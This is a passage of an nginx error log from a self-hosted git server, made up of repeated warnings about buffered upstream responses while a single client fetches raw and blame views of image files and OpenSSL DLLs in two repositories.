/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:16:12 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/22/0000014228 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:16:19 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/22/0000014229 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:16:27 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/23/0000014230 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:16:36 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/23/0000014231 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:16:49 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/23/0000014232 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:16:57 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/23/0000014233 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:17:03 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/23/0000014234 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:18:23 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/23/0000014235 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" -2026/02/17 14:18:37 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/23/0000014236 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" -2026/02/17 14:19:05 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/23/0000014237 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" -2026/02/17 14:19:08 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/23/0000014238 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" -2026/02/17 14:19:19 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/23/0000014239 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" -2026/02/17 14:19:33 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/24/0000014240 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" -2026/02/17 14:20:56 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/24/0000014241 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:21:03 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/24/0000014242 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:21:06 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/24/0000014243 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:21:08 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/24/0000014244 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" -2026/02/17 14:21:18 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/24/0000014245 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:21:25 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/24/0000014246 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:21:32 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/24/0000014247 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:21:39 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/24/0000014248 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:23:36 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/24/0000014249 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" -2026/02/17 14:25:26 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/25/0000014250 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" -2026/02/17 14:25:56 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/25/0000014251 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" -2026/02/17 14:27:57 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/25/0000014252 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -2026/02/17 14:27:59 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/25/0000014253 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -2026/02/17 14:28:45 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/25/0000014254 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" -2026/02/17 14:31:21 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/25/0000014255 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" -2026/02/17 14:31:31 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/25/0000014256 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:31:38 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/25/0000014257 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:31:46 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/25/0000014258 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:31:52 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/25/0000014259 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:31:59 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/26/0000014260 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:32:03 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/26/0000014261 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:32:09 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/26/0000014262 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:33:21 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/26/0000014263 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" -2026/02/17 14:33:29 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/26/0000014264 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" -2026/02/17 14:33:38 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/26/0000014265 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:33:46 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/26/0000014266 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:33:53 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/26/0000014267 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:34:00 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/26/0000014268 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: 